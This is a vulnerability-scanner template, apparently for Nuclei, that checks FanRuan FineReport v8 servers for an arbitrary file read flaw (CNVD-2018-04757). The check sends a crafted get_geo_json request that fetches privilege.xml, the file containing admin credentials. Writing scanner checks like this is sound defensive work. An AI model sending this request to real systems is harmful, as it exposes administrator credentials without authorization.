http:
    - matchers:
        - status:
            - 200
          type: status
        - part: body
          type: word
          words:
            - '![CDATA[admin]'
      matchers-condition: and
      payloads:
        path:
            - /seeyonreport/ReportServer
            - /ReportServer
            - /WebReport/ReportServer
      raw:
        - |
          GET {{path}}?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1
          Host: {{Hostname}}
      stop-at-first-match: true
id: fanruan-finereport-v8-getgeojson-fileread-CNVD-2018-04757
info:
    author: pphua
    description: FineReport报表软件是一款纯Java编写的，集数据展示(报表)和数据录入(表单)功能于一身的企业级web报表工具。FineReport v8.0版本存在任意文件读取漏洞，攻击者可利用漏洞读取网站任意文件
    name: 帆软报表 V8 get_geo_json 任意文件读取漏洞 CNVD-2018-04757
    reference: null
    severity: medium
    tags:
        - CNVD-2018-04757
        - fanruan
        - finereport
        - fileread
